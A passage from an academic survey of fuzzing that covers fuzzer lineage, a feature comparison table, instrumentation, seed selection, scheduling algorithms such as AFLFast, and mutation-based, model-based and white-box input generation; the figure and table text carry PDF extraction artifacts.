CLsmith ὖE[140]
IFuzzerὖE[213]
CodeAlchemist ὖE[100]Peach [76]
antiparser [149]
Autodaf  ́eὖE[214]GPF [6]
Sulley [16]
Radamsa [102]
Tavor [240]
Dharma [3]
NeuralFuzzer [62]Hodor [161]
IoTFuzzer ὖE[54]fsfuzzer [143]
Trinity [115]
perf fuzzerὖE[221]
KernelFuzzer [157]
DigtoolὖE[168]
DIFUZE ὖE[64]
IMFὖE[99]orangfuzz [188]FLAXὖE[182]
Doup  ́eet al.ὖE[73]honggfuzz [204]
MambaὖE[117]
AFL [231]
Nightmare [129]
Choronzon ὖE[194]
go-fuzz [215]
QuickFuzz ὖE[94]
AFLFast ὖE[37]
classfuzz ὖE[59]GRR [211]
SkyfireὖE[217]
GLADEὖE[30]
VUzzerὖE[176]
AFLGoὖE[36]
Hawkeye ὖE[53]
AngoraὖE[56]
CollAFL ὖE[83]
FairFuzz ὖE[136]
REDQUEEN ὖE[23]
NAUTILUS ὖE[22]syzkaller [216]
Triforce [162]
kAFLὖE[184]
PeriScope ὖE[196]Sidewinder [78]
EFSὖE[68]
LibFuzzer [7]CalFuzzer ὖE[189]
AtomFuzzer ὖE[169]
RaceFuzzer ὖE[190]
DeadlockFuzzer ὖE[116]
AssetFuzzer ὖE[131]
MagicFuzzer ὖE[47]SAGEὖE[87], [88], [90]
KLEEὖE[46]
BuzzFuzz ὖE[84]jFuzzὖE[112]
SmartFuzz ὖE[154]
TaintScope ὖE[219]BitFuzzὖE[44]
FuzzBALL ὖE[27], [147], [48]
kb-Anonymity ὖE[43]
Mahmood et al.ὖE[146]
DowserὖE[97]
GRTὖE[145]
MutaGen ὖE[123]
NaradaὖE[181]
DrillerὖE[200]
MoWFὖE[172]
CAB-Fuzz ὖE[125]
T-FuzzὖE[170]
Chopper ὖE[210]
QSYMὖE[230]
DigFuzz ὖE[239]1990
∼
2001
2005
2006
2007
2008
2009
2010
2011
2012
2013
2014
2015
2016
2017
2018
2019
Fig. 1: Genealogy tracing significant fuzzers’ lineage back to Miller et al.’s seminal work. Each node in the same row
represents a set of fuzzers appeared in the same year. A solid arrow from XtoYindicates that Ycites, references, or
otherwise uses techniques from X.ὖEdenotes that a paper describing the work was published.
6
TABLE 1: Overview of fuzzers sorted by their instrumentatio n granularity and their name. /CIRCLE,/RIGHTCIRCLE /Circle, and/Circlerepresent black-,
grey-, and white-box, respectively.
Misc. PREPROCESS SCHEDULE INPUTGEN INPUTEVALCONFUPDATE
Fuzzer
Feedback Gathering Granularity Open-Sourced Source Code Required
Support In-memory Fuzzing
Model Construction
Program Analysis
Seed Scheduling
Mutation
Model-based Constraint-based
Taint Analysis
Crash Triage: Stack Hash Crash Triage: Coverage
Evolutionary Seed Pool Update Model Update Seed Pool CullingBFF [49] /CIRCLE✓ ✓/CIRCLE ✓
CodeAlchemist [100] /CIRCLE✓ /RIGHTCIRCLE /Circle ✓
CLsmith [140] /CIRCLE✓ /CIRCLE✓
DELTA [134] /CIRCLE /CIRCLE✓
DIFUZE [64] /CIRCLE✓✓/Circle /CIRCLE✓
Digtool [168] /CIRCLE /CIRCLE
Doup ́ e et al. [73] /CIRCLE ✓ /CIRCLE
FOE [50] /CIRCLE✓ ✓/CIRCLE ✓
GLADE [30] /CIRCLE✓ /CIRCLE ✓ ✓ /CIRCLE
IMF [99] /CIRCLE✓ /CIRCLE /CIRCLE✓
jsfunfuzz [187] /CIRCLE✓ ✓ ✓
LangFuzz [105] /CIRCLE /CIRCLE✓
Miller et al. [152] /CIRCLE✓
Peach [76] /CIRCLE✓ ✓ ✓
PULSAR [85] /CIRCLE✓ /CIRCLE ✓ /CIRCLE
Radamsa [102] /CIRCLE✓ /CIRCLE✓
Ruiter et al. [180] /CIRCLE ✓ /CIRCLE
TLS-Attacker [195] /CIRCLE✓ /CIRCLE
zuff [103] /CIRCLE✓ /CIRCLE
FLAX [182] /CIRCLE+/Circle ✓ ✓ /CIRCLE ✓
IoTFuzzer [54] /CIRCLE+/Circle /CIRCLE✓ /CIRCLE✓
SymFuzz [52] /CIRCLE+/Circle✓ ✓ /CIRCLE ✓
AFL [231] /RIGHTCIRCLE /Circle✓ ✓ ✓/CIRCLE ✓ ✓ ✓
AFLFast [37] /RIGHTCIRCLE /Circle✓ ✓ ✓†/CIRCLE ✓ ✓ ✓
AFLGo [36] /RIGHTCIRCLE /Circle✓✓✓ ✓ ✓†/CIRCLE ✓ ✓ ✓
AssetFuzzer [131] /RIGHTCIRCLE /Circle ✓ ✓
AtomFuzzer [169] /RIGHTCIRCLE /Circle✓✓ ✓
CalFuzzer [189] /RIGHTCIRCLE /Circle✓ ✓ ✓
classfuzz [59] /RIGHTCIRCLE /Circle ✓/CIRCLE
CollAFL [83] /RIGHTCIRCLE /Circle†✓✓ ✓†/CIRCLE ✓ ✓ ✓
DeadlockFuzzer [116] /RIGHTCIRCLE /Circle✓✓ ✓
FairFuzz [136] /RIGHTCIRCLE /Circle✓ ✓ ✓†/RIGHTCIRCLE /Circle†✓ ✓ ✓
go-fuzz [215] /RIGHTCIRCLE /Circle✓✓ ✓/CIRCLE✓ ✓ ✓/RIGHTCIRCLE /Circle✓
Hawkeye [53] /RIGHTCIRCLE /Circle ✓✓ ✓ ✓/RIGHTCIRCLE /Circle ✓ ✓
honggfuzz [204] /RIGHTCIRCLE /Circle✓ /CIRCLE ✓ ✓
kAFL [184] /RIGHTCIRCLE /Circle✓ /CIRCLE ✓
LibFuzzer [7] /RIGHTCIRCLE /Circle✓✓✓ ✓/CIRCLE ✓ ✓
MagicFuzzer [47] /RIGHTCIRCLE /Circle✓ ✓ ✓
Nautilus [22] /RIGHTCIRCLE /Circle✓✓ ✓ ✓✓ ✓
RaceFuzzer [190] /RIGHTCIRCLE /Circle✓ ✓ ✓
RedQueen [23] /RIGHTCIRCLE /Circle✓ ✓/RIGHTCIRCLE /Circle ✓
Steelix [138] /RIGHTCIRCLE /Circle†✓ ✓ ✓†/RIGHTCIRCLE /Circle ✓ ✓†✓
Syzkaller [216] /RIGHTCIRCLE /Circle✓✓ ✓/CIRCLE✓ ✓ ✓ ✓
Angora [56] /RIGHTCIRCLE /Circle+/Circle✓ ✓ /RIGHTCIRCLE /Circle ✓ ✓
Cyberdyne [92] /RIGHTCIRCLE /Circle+/Circle✓ ✓ ✓/CIRCLE ✓ ✓ ✓ ✓
DigFuzz [239] /RIGHTCIRCLE /Circle+/Circle ✓/CIRCLE ✓ ✓ ✓ ✓
Driller [200] /RIGHTCIRCLE /Circle+/Circle✓ ✓/CIRCLE ✓ ✓ ✓ ✓
QSYM [230] /RIGHTCIRCLE /Circle+/Circle✓ ✓/CIRCLE ✓ ✓ ✓ ✓
T-Fuzz [170] /RIGHTCIRCLE /Circle+/Circle✓ ✓ ✓ ✓†/CIRCLE ✓ ✓ ✓ ✓
VUzzer [176] /RIGHTCIRCLE /Circle+/Circle✓ ✓ ✓ ✓ ✓/RIGHTCIRCLE /Circle
BitFuzz [44] /Circle ✓ ✓
BuzzFuzz [84] /Circle ✓ ✓ /RIGHTCIRCLE /Circle ✓ ✓
CAB-Fuzz [125] /Circle ✓ ✓ ✓
Chopper [210] /Circle✓ ✓ ✓ ✓
Dewey et al. [70] /Circle✓✓ ✓✓
Dowser [97] /Circle ✓ ✓ ✓
GRT [145] /Circle ✓ ✓ ✓ ✓ ✓ /Circle
KLEE [46] /Circle✓ ✓ ✓
MoWF [172] /Circle ✓✓
MutaGen [123] /Circle /CIRCLE /CIRCLE
Narada [181] /Circle✓✓ ✓
SAGE [90] /Circle ✓
TaintScope [219] /Circle ✓ ✓/RIGHTCIRCLE /Circle ✓ ✓
†The corresponding fuzzer is derived from AFL, and it changed this part of the fuzzing algorithm.
7
Program instrumentation can be either static or
dynamic—the former happens before the PUT runs
(PREPROCESS ), whereas the latter happens while the PUT
is running ( INPUTEVAL). But for the reader’s convenience,
we summarize both static and dynamic instrumentation in
this section.
Static instrumentation is often performed at compile
time on either source code or intermediate code. Since it
occurs before runtime, it generally imposes less runtime
overhead than dynamic instrumentation. If the PUT relies
on libraries, these have to be separately instrumented, com -
monly by recompiling them with the same instrumentation.
Beyond source-based instrumentation, researchers have al so
developed binary-level static instrumentation (i.e., bin ary
rewriting) tools [238], [132], [77].
Although it has higher overhead than static instrumen-
tation, dynamic instrumentation has the advantage that it
can easily instrument dynamically linked libraries, becau se
the instrumentation is performed at runtime. There are
several well-known dynamic instrumentation tools such as
DynInst [173], DynamoRIO [42], Pin [144], Valgrind [163],
and QEMU [33].
A given fuzzer can support more than one type of
instrumentation. For example, AFL supports static instru-
mentation at the source code level with a modified compiler,
or dynamic instrumentation at the binary level with the help
of QEMU [33]. When using dynamic instrumentation, AFL
can either instrument (1) executable code in the PUT itself,
which is the default setting, or (2) executable code in the
PUT and any external libraries (with the AFL_INST_LIBS
option). The second option—instrumenting all encountered
code—can report coverage information for code in external
libraries, and thus provides a more complete picture of
coverage. However, this will also encourage AFL to fuzz
additional paths in external library functions.
3.1.1 Execution Feedback
Grey-box fuzzers typically take execution feedback as inpu t
to evolve test cases. AFL and its descendants compute
branch coverage by instrumenting every branch instruction
in the PUT. However, they store the branch coverage in-
formation in a bit vector, which can cause path collisions.
CollAFL [83] recently addressed this issue by introducing a
new path-sensitive hash function. Meanwhile, LibFuzzer [7 ]
and Syzkaller [216] use node coverage as their execution
feedback. Honggfuzz [204] allows users to choose which
execution feedback to use.
3.1.2 In-Memory Fuzzing
When testing a large program, it is sometimes desirable to
fuzz only a portion of the PUT without re-spawning a process
for each fuzz iteration in order to minimize execution over-
head. For example, complex (e.g., GUI) applications often
require several seconds of processing before they accept
input. One approach to fuzzing such programs is to take
a snapshot of the PUT after the GUI is initialized. To fuzz
a new test case, one can then restore the memory snapshot
before writing the new test case directly into memory and
executing it. The same intuition applies to fuzzing network
applications that involve heavy interaction between clien t
and server. This technique is called in-memory fuzzing [104 ].As an example, GRR [211], [92] creates a snapshot before
loading any input bytes. This way, it can skip over unneces-
sary startup code. AFL also employs a fork server to avoid
some of the process startup costs. Although it has the same
motivation as in-memory fuzzing, a fork server involves
forking off a new process for every fuzz iteration (see §6).
Some fuzzers [7], [231] perform in-memory fuzzing on
a function without restoring the PUT’s state after each
iteration. We call such a technique as an in-memory API
fuzzing . For example, AFL has an option called persistent
mode [233], which repeatedly performs in-memory API
fuzzing in a loop without restarting the process. In this cas e,
AFL ignores potential side effects from the function being
called multiple times in the same execution.
Although efficient, in-memory API fuzzing suffers from
unsound fuzzing results: bugs (or crashes) found from in-
memory fuzzing may notbe reproducible, because (1) it is
not always feasible to construct a valid calling context for
the target function, and (2) there can be side-effects that a re
not captured across multiple function calls. Notice that th e
soundness of in-memory API fuzzing mainly depends on
the entry point function, and finding such a function is a
challenging task.
3.1.3 Thread Scheduling
Race condition bugs can be difficult to trigger because they
rely on non-deterministic behaviors which may only occur
infrequently. However, instrumentation can also be used
to trigger different non-deterministic program behaviors
by explicitly controlling how threads are scheduled [189],
[190], [169], [116], [131], [47], [181]. Existing work has s hown
that even randomly scheduling threads can be effective at
finding race condition bugs [189].
3.2 Seed Selection
Recall from §2 that fuzzers receive a set of fuzz configura-
tions that control the behavior of the fuzzing algorithm. Un -
fortunately, some parameters of fuzz configurations, such a s
seeds for mutation-based fuzzers, have large value domains .
For example, suppose an analyst fuzzes an MP3 player
that accepts MP3 files as input. There is an unbounded
number of valid MP3 files, which raises a natural question:
which seeds should we use for fuzzing? This problem of
decreasing the size of the initial seed pool is known as the
seed selection problem [177].
There are several approaches and tools that address the
seed selection problem [177], [76]. A common approach is to
find a minimal set of seeds that maximizes a coverage met-
ric, e.g., node coverage, and this process is called computi ng
aminset . For example, suppose the current set of configura-
tionsCconsists of two seeds s1ands2that cover the follow-
ing addresses of the PUT: {s1→ {10,20},s2→ {20,30}}.
If we have a third seed s3→ {10,20,30}that executes
roughly as fast as s1ands2, one could argue it makes sense
to fuzzs3instead of s1ands2, since it intuitively tests more
program logic for half the execution time cost. This intuiti on
is supported by Miller’s report [153], which showed that a
1% increase in code coverage increased the percentage of
bugs found by .92%. As is noted in §7.2, this step can also
be part of CONFUPDATE , which is useful for fuzzers that
8
can introduce new seeds into the seed pool throughout the
campaign.
Fuzzers use a variety of different coverage metrics in
practice. For example, AFL’s minset is based on branch
coverage with a logarithmic counter on each branch. The
rationale behind this decision is to allow branch counts to
be considered different only when they differ in orders of
magnitude. Honggfuzz [204] computes coverage based on
the number of executed instructions, executed branches, an d
unique basic blocks. This metric allows the fuzzer to add
longer executions to the minset, which can help discover
denial of service vulnerabilities or performance problems .
3.3 Seed Trimming
Smaller seeds are likely to consume less memory and entail
higher throughput. Therefore, some fuzzers attempt to re-
duce the size of seeds prior to fuzzing them, which is called
seed trimming . Seed trimming can happen prior to the main
fuzzing loop in PREPROCESS or as part of CONFUPDATE .
One notable fuzzer that uses seed trimming is AFL [231],
which uses its code coverage instrumentation to iterativel y
remove a portion of the seed as long as the modified seed
achieves the same coverage. Meanwhile, Rebert et al. [177]
reported that their size minset algorithm, which selects
seeds by giving higher priority to smaller seeds in size,
results in fewer unique bugs compared to a random seed
selection. For the specific case of fuzzing Linux system call
handlers, MoonShine [167] extends syzkaller [216] to reduc e
the size of seeds while preserving the dependencies between
calls which are detected using a static analysis.
3.4 Preparing a Driver Application
When it is difficult to directly fuzz the PUT, it makes sense to
prepare a driver for fuzzing. This process is largely manual
in practice although this is done only once at the beginning
of a fuzzing campaign. For example, when our target is
a library, we need to prepare for a driver program that
calls functions in the library. Similarly, kernel fuzzers m ay
fuzz userland applications to test kernels [125], [165], [3 1].
IoTFuzzer [54] targets IoT devices by letting the driver com -
municate with the corresponding smartphone application.
4 S CHEDULING
In fuzzing, scheduling means selecting a fuzz configura-
tion for the next fuzz iteration. As we have explained
in§2.1, the content of each configuration depends on the
type of the fuzzer. For simple fuzzers, scheduling can be
straightforward—for example, zzuf [103] in its default mod e
allows only one configuration and thus there is simply no
decision to make. But for more advanced fuzzers such as
BFF [49] and AFLFast [37], a major factor to their success
lies in their innovative scheduling algorithms. In this sec tion,
we will discuss scheduling algorithms for black- and grey-
box fuzzing only; scheduling in white-box fuzzing requires
a complex setup unique to symbolic executors and we refer
the reader to another source [38].4.1 The Fuzz Configuration Scheduling (FCS) Problem
The goal of scheduling is to analyze the currently-availabl e
information about the configurations and pick one that is
likely to lead to the most favorable outcome, e.g., finding th e
most number of unique bugs, or maximizing the coverage
attained by the set of generated inputs. Fundamentally, ev-
ery scheduling algorithm confronts the same exploration vs.
exploitation conflict—time can either be spent on gathering
more accurate information on each configuration to inform
future decisions (explore), or on fuzzing the configuration s
that are currently believed to lead to more favorable out-
comes (exploit). Woo et al. [225] dubbed this inherent conflict
the Fuzz Configuration Scheduling (FCS) Problem.
In our model fuzzer (Algorithm 1), the function
SCHEDULE selects the next configuration based on (i) the
current set of fuzz configurations C, (ii) the current time
telapsed , and (iii) the total time budget tlimit. This configu-
ration is then used for the next fuzz iteration. Notice that
SCHEDULE is only about decision-making. The information
on which this decision is based is acquired by PREPROCESS
andCONFUPDATE , which augment Cwith this knowledge.
4.2 Black-box FCS Algorithms
In the black-box setting, the only information an FCS algo-
rithm can use is the fuzz outcomes of a configuration—the
number of crashes and bugs found with it and the amount
of time spent on it so far. Householder and Foote [107] were
the first to study how such information can be leveraged
in the CERT BFF black-box mutational fuzzer [49]. They
postulated that a configuration with a higher observed
success rate (#bugs / #runs) should be preferred. Indeed,
after replacing the uniform-sampling scheduling algorith m
in BFF, they observed 85% more unique crashes over 5
million runs of ffmpeg, demonstrating the potential benefit
of more advanced FCS algorithms.
Shortly after, the above idea was improved on multiple
fronts by Woo et al. [225]. First, they refined the mathemati-
cal model of black-box mutational fuzzing from a sequence
of Bernoulli trials [107] to the Weighted Coupon Collector’s
Problem with Unknown Weights (WCCP/UW). Whereas the
former assumes each configuration has a fixed eventual
success probability and learns it over time, the latter ex-
plicitly maintains an upper-bound on this probability as it
decays. Second, the WCCP/UW model naturally leads Woo
et al. to investigate algorithms for multi-armed bandit (MAB)
problems, which is a popular formalism to cope with the
exploration vs. exploitation conflict in decision science [ 34].
To this end, they were able to design MAB algorithms to
accurately exploit configurations that are not known to have
decayed yet. Third, they observed that, all else being equal ,
a configuration that is faster to fuzz allows a fuzzer to
either collect more unique bugs with it, or decrease the
upperbound on its future success probability more rapidly.
This inspired them to normalize the success probability of
a configuration by the time that has been spent on it, thus
causing a faster configuration to be more preferable. Fourth ,
they changed the orchestration of fuzz runs in BFF from a
fixed number of fuzz iterations per configuration selection
(“epochs” in BFF parlance) to a fixed amount of time per
selection. With this change, BFF is no longer forced to spend
9
more time in a slow configuration before it can re-select. By
combining the above, the evaluation [225] showed a 1.5×
increase in the number of unique bugs found using the same
amount of time as the existing BFF.
4.3 Grey-box FCS Algorithms
In the grey-box setting, an FCS algorithm can choose to use
a richer set of information about each configuration, e.g., t he
coverage attained when fuzzing a configuration. AFL [231]
is the forerunner in this category and it is based on an
evolutionary algorithm (EA). Intuitively, an EA maintains
a population of configurations, each with some value of
“fitness”. An EA selects fit configurations and applies them
to genetic transformations such as mutation and recom-
bination to produce offspring, which may later become
new configurations. The hypothesis is that these produced
configurations are more likely to be fit.
To understand FCS in the context of an EA, we need
to define (i) what makes a configuration fit, (ii) how con-
figurations are selected, and (iii) how a selected configu-
ration is used. As a high-level approximation, among the
configurations that exercise a control-flow edge, AFL con-
siders the one that contains the fastest and smallest input
to be fit (“favorite” in AFL parlance). AFL maintains a
queue of configurations, from which it selects the next fit
configuration essentially as if the queue is circular. Once
a configuration is selected, AFL fuzzes it for essentially
a constant number of runs. From the perspective of FCS,
notice that the preference for fast configurations is common
for the black-box setting [225].
Recently, AFLFast by B ̈ ohme et al . [37] has improved
upon AFL in each of the three aspects above. First, AFLFast
adds two overriding criteria for an input to become a “fa-
vorite”: (i) Among the configurations that exercise a contro l-
flow edge, AFLFast favors the one that has been chosen least.
This has the effect of cycling among configurations that exer -
cise this edge, thus increasing exploration. (ii) When ther e is
a tie in (i), AFLFast favors the one that exercises a path that
has been exercised least. This has the effect of increasing t he
exercise of rare paths, which may uncover more unobserved
behavior. Second, AFLFast forgoes the round-robin selecti on
in AFL and instead selects the next fit configuration based
on a priority. In particular, a fit configuration has a higher
priority than another if it has been chosen less often or, whe n
tied, if it exercises a path that has been exercised less ofte n.
In the same spirit as the first change, this has the effect of
increasing the exploration among fit configurations and the
exercising of rare paths. Third, AFLFast fuzzes a selected
configuration a variable number of times as determined by
apower schedule . The FAST power schedule in AFLFast starts
with a small “energy” value to ensure initial exploration
among configurations and increases exponentially up to a
limit to quickly ensure sufficient exploitation. In additio n,
it also normalizes the energy by the number of generated
inputs that exercise the same path, thus promoting explo-
rations of less-frequently fuzzed configurations. The over all
effect of these changes is very significant—in a 24-hour
evaluation, B ̈ ohme et al . observed AFLFast discovered 3
bugs that AFL did not, and was on average 7 ×faster than
AFL on 6 other bugs that were discovered by both.AFLGo [36] extends AFLFast by modifying its priority
attribution in order to target specific program locations.
Hawkeye [53] further improves directed fuzzing by lever-
aging a static analysis in its seed scheduling and input gen-
eration. FairFuzz [136] guides the campaign to exercise rar e
branches by employing a mutation mask for each pair of a
seed and a rare branch. QTEP [218] uses static analysis to
infer which part of the binary is more ‘faulty’ and prioritiz e
configurations that cover them.
5 I NPUT GENERATION
Since the content of a test case directly controls whether or
not a bug is triggered, the technique used for input generation
is naturally one of the most influential design decisions in
a fuzzer. Traditionally, fuzzers are categorized into eith er
generation- or mutation-based fuzzers [203]. Generation-
based fuzzers produce test cases based on a given model
that describes the inputs expected by the PUT. We call such
fuzzers model-based fuzzers in this paper. On the other hand,
mutation-based fuzzers produce test cases by mutating a
given seed input. Mutation-based fuzzers are generally con-
sidered to be model-less because seeds are merely example
inputs and even in large numbers they do not completely
describe the expected input space of the PUT. In this section ,
we explain and classify the various input generation tech-
niques used by fuzzers based on the underlying test case
generation ( INPUTGEN) mechanism.
5.1 Model-based (Generation-based) Fuzzers
Model-based fuzzers generate test cases based on a given
model that describes the inputs or executions that the PUT
may accept, such as a grammar precisely characterizing the
input format or less precise constraints such as magic value s
identifying file types.
5.1.1 Predefined Model
Some fuzzers use a model that can be configured by the user.
For example, Peach [76], PROTOS [120], and Dharma [3]
take in a specification provided by the user. Autodaf ́ e [214] ,
Sulley [16], SPIKE [13], and SPIKEfile [202] expose APIs that
allow analysts to create their own input models. Tavor [240]
also takes in an input specification written in Extended
Backus-Naur form (EBNF) and generates test cases conform-
ing to the corresponding grammar. Similarly, network pro-
tocol fuzzers such as PROTOS [120], SNOOZE [29], KiF [12],
and T-Fuzz [114] also take in a protocol specification from
the user. Kernel API fuzzers [115], [216], [157], [162], [22 1]
define an input model in the form of system call templates.
These templates commonly specify the number and types of
arguments a system call expects as inputs. The idea of using
a model in kernel fuzzing originated in Koopman et al .’s
seminal work [128] where they compared the robustness
of OSes with a finite set of manually chosen test cases for
system calls. Nautilus [22] employs grammar-based input
generation for general-purpose fuzzing, and also uses its
grammar for seed trimming (see §3.3).
Other model-based fuzzers target a specific language
or grammar, and the model of this language is built in
to the fuzzer itself. For example, cross fuzz [232] and
10
DOMfuzz [187] generate random Document Object Model
(DOM) objects. Likewise, jsfunfuzz [187] produces random,
but syntactically correct JavaScript code based on its own
grammar model. QuickFuzz [94] utilizes existing Haskell li -
braries that describe file formats when generating test case s.
Some network protocol fuzzers such as Frankencerts [41],
TLS-Attacker [195], tlsfuzzer [124], and llfuzzer [198] ar e
designed with models of specific network protocols such
as TLS and NFC. Dewey et al. [69], [70] proposed a way to
generate test cases that are not only grammatically correct ,
but also semantically diverse by leveraging constraint log ic
programming. LangFuzz [105] produces code fragments
by parsing a set of seeds that are given as input. It then
randomly combines the fragments, and mutates seeds with
the fragments to generate test cases. Since it is provided
with a grammar, it always produces syntactically correct
code. LangFuzz was applied to JavaScript and PHP. Blend-
Fuzz [229] is based on similar ideas as LangFuzz, but targets
XML and regular expression parsers.
5.1.2 Inferred Model
Inferring the model rather than relying on a predefined
or user-provided model has recently been gaining traction.
Although there is an abundance of published research
on the topic of automated input format and protocol re-
verse engineering [66], [45], [141], [63], [28], only a few
fuzzers leverage these techniques. Similar to instrumenta -
tion (§3.1), model inference can occur in either PREPROCESS
orCONFUPDATE .
5.1.2.1 Model Inference in PREPROCESS : Some
fuzzers infer the model as a preprocessing step. Test-
Miner [67] searches for the data available in the PUT, such
as literals, to predict suitable inputs. Given a set of seeds
and a grammar, Skyfire [217] uses a data-driven approach
to infer a probabilitistic context-sensitive grammar, and then
uses it to generate a new set of seeds. Unlike previous
works, it focuses on generating semantically valid inputs.
IMF [99] learns a kernel API model by analyzing system
API logs, and it produces C code that invokes a sequence
of API calls using the inferred model. CodeAlchemist [100]
breaks JavaScript code into “code bricks”, and computes
assembly constraints, which describe when distinct bricks
can be assembled or merged together to produce semanti-
cally valid test cases. These constraints are computed usin g
both a static analysis and dynamic analysis. Neural [62]
and Learn&Fuzz [91] use a neural network-based machine
learning technique to learn a model from a given set of
test files, and generate test cases from the inferred model.
Liuet al. [142] proposed a similar approach specific to text
inputs.
5.1.2.2 Model Inference in CONFUPDATE : Other
fuzzers can potentially update their model after each fuzz
iteration. PULSAR [85] automatically infers a network prot o-
col model from a set of captured network packets generated
from a program. The learned network protocol is then used
to fuzz the program. PULSAR internally builds a state
machine, and maps which message token is correlated with
a state. This information is later used to generate test case s
that cover more states in the state machine. Doup ́ e et al. [73]
propose a way to infer the state machine of a web service by
observing the I/O behavior. The inferred model is then usedto scan for web vulnerabilities. The work of Ruiter et al. [180]
is similar, but targets TLS and bases its implementation
on LearnLib [174]. GLADE [30] synthesizes a context-free
grammar from a set of I/O samples, and fuzzes the PUT
using the inferred grammar. Finally, go-fuzz [215] is a grey -
box fuzzer, which builds a model for each of the seed it adds
to its seed pool. This model is used to generate new inputs
from this seed.
5.1.3 Encoder Model
Fuzzing is often used to test decoder programs which parse
a certain file format. Many file formats have corresponding
encoder programs, which can be thought of as an implicit
model of the file format. MutaGen [123] is a unique fuzzer
that leverages this implicit model contained in an encoder
program to generate new test cases. MutaGen leverages mu-
tation to generate test cases, but unlike most mutation-bas ed
fuzzers, which mutate an existing test case (see§5.2), Muta-
Gen mutates the encoder program . Specifically, to produce a
new test case MutaGen computes a dynamic program slice
of the encoder program and runs it. The underlying idea is
that the program slices will slightly change the behavior of
the encoder program so that it produces testcases that are
slightly malformed.
5.2 Model-less (Mutation-based) Fuzzers
Classic random testing [20], [98] is not efficient in generat ing
test cases that satisfy specific path conditions. Suppose th ere
is a simple C statement: if (input == 42) . Ifinput is
a 32-bit integer, the probability of randomly guessing the
right input value is 1/232. The situation gets worse when
we consider well-structured input such as an MP3 file. It
is extremely unlikely that random testing will generate a
valid MP3 file as a test case in a reasonable amount of time.
As a result, the MP3 player will mostly reject the generated
test cases from random testing at the parsing stage before
reaching deeper parts of the program.
This problem motivates the use of seed-based input
generation as well as white-box input generation (see §5.3).
Most model-less fuzzers use a seed, which is an input to the
PUT, in order to generate test cases by modifying the seed. A
seed is typically a well-structured input of a type supporte d
by the PUT: a file, a network packet, or a sequence of UI
events. By mutating only a fraction of a valid file, it is often
possible to generate a new test case that is mostly valid, but
also contains abnormal values to trigger crashes of the PUT.
There are a variety of methods used to mutate seeds, and
we describe the common ones below.
5.2.1 Bit-Flipping
Bit-flipping is a common technique used by many model-
less fuzzers [231], [204], [103], [6], [102]. Some fuzzers s imply
flip a fixed number of bits, while others determine the
number of bits to flip at random. To randomly mutate
seeds, some fuzzers employ a user-configurable parameter
called the mutation ratio , which determines the number of
bit positions to flip for a single execution of INPUTGEN.
Suppose a fuzzer wants to flip Krandom bits from a given
N-bit seed. In this case, a mutation ratio of the fuzzer is
K/N .
11
SymFuzz [52] showed that fuzzing performance is sensi-
tive to the mutation ratio, and that there is not a single rati o
that works well for all PUTs. There are several approaches
to find a good mutation ratio. BFF [49] and FOE [50] use
an exponentially scaled set of mutation ratios for each seed
and allocate more iterations to mutation ratios that prove
to be statistically effective [107]. SymFuzz [52] leverage s a
white-box program analysis to infer a good mutation ratio
for each seed.
5.2.2 Arithmetic Mutation
AFL [231] and honggfuzz [204] contain another mutation
operation where they consider a selected byte sequence as
an integer, and perform simple arithmetic on that value.
The computed value is then used to replace the selected
byte sequence. The key intuition is to bound the effect of
mutation by a small number. For example, AFL selects a 4-
byte value from a seed, and treats the value as an integer i.
It then replaces the value in the seed with i±r, whereris a
randomly generated small integer. The range of rdepends
on the fuzzer, and is often user-configurable. In AFL, the
default range is: 0≤r <35.
5.2.3 Block-based Mutation
There are several block-based mutation methodologies,
where a block is a sequence of bytes of a seed: (1) insert
a randomly generated block into a random position of a
seed [231], [7]; (2) delete a randomly selected block from a
seed [231], [102], [204], [7]; (3) replace a randomly select ed
block with a random value [231], [204], [102], [7]; (4) ran-
domly permute the order of a sequence of blocks [102], [7];
(5) resize a seed by appending a random block [204]; and (6)
take a random block from a seed to insert/replace a random
block of another seed [231], [7].
5.2.4 Dictionary-based Mutation
Some fuzzers use a set of predefined values with potentially
significant semantic weight, e.g., 0 or −1, and format strings
for mutation. For example, AFL [231], honggfuzz [204],
and LibFuzzer [7] use values such as 0, -1, and 1 when
mutating integers. Radamsa [102] employs Unicode strings
and GPF [6] uses formatting characters such as %xand%s
to mutate strings [55].
5.3 White-box Fuzzers
White-box fuzzers can also be categorized into either model -
based or model-less fuzzers. For example, traditional dy-
namic symbolic execution [90], [112], [27], [147], [200] do es
not require any model as in mutation-based fuzzers, but
some symbolic executors [88], [172], [125] leverage input
models such as an input grammar to guide the symbolic
executor.
Although many white-box fuzzers including the semi-
nal work by Godefroid et al . [90] use dynamic symbolic
execution to generate test cases, not all white-box fuzzers
are dynamic symbolic executors. Some fuzzers [219], [52],
[145], [182] leverage a white-box program analysis to find
information about the inputs a PUT accepts in order to use
it with black- or grey-box fuzzing. In the rest of this subsec -
tion, we briefly summarize the existing white-box fuzzingtechniques based on their underlying test case algorithm.
Please note that we intentionally omit dynamic symbolic
executors such as [89], [191], [60], [46], [209], [51] unles s they
explicitly call themselves as a fuzzer as mentioned in §2.2.
5.3.1 Dynamic Symbolic Execution
At a high level, classic symbolic execution [126], [39], [10 8]
runs a program with symbolic values as inputs, which
represents all possible values. As it executes the PUT, it
builds symbolic expressions instead of evaluating concret e
values. Whenever it reaches a conditional branch instructi on,
it conceptually forks two symbolic interpreters, one for th e
true branch and another for the false branch. For every
path, a symbolic interpreter builds up a path formula (or
path predicate) for every branch instruction it encountere d
during an execution. A path formula is satisfiable if there
is a concrete input that executes the desired path. One can
generate concrete inputs by querying an SMT solver [155]
for a solution to a path formula. Dynamic symbolic execu-
tion is a variant of traditional symbolic execution, where
both symbolic execution and concrete execution operate at
the same time. Thus, we often refer to dynamic symbolic
execution as concolic (concrete + symbolic) testing. The
idea is that concrete execution states can help reduce the
complexity of symbolic constraints. An extensive review
of the academic literature of dynamic symbolic execution,
beyond its application to fuzzing, is out of the scope of this
paper. However, a broader treatment of dynamic symbolic
execution can be found in other sources [17], [185].
Dynamic symbolic execution is slow compared to grey-
box or black-box approaches as it involves instrumenting
and analyzing every single instruction of the PUT. To cope
with the high cost, a common strategy has been to narrow
its usage; for instance, by letting the user to specify unin-
teresting parts of the code [210], or by alternating between
concolic testing and grey-box fuzzing. Driller [200] and
Cyberdyne [92] have shown the usefulness of this technique
at the DARPA Cyber Grand Challenge. QSYM [230] seeks
to improve the integration between grey- and white-box
fuzzing by implementing a fast concolic execution engine.
DigFuzz [239] optimizes the switch between grey- and
white-box fuzzing by first estimating the probability of ex-
ercising each path using grey-box fuzzing, and then having
its white-box fuzzer focus on the paths that are believed to
be most challenging for grey-box fuzzing.
5.3.2 Guided Fuzzing
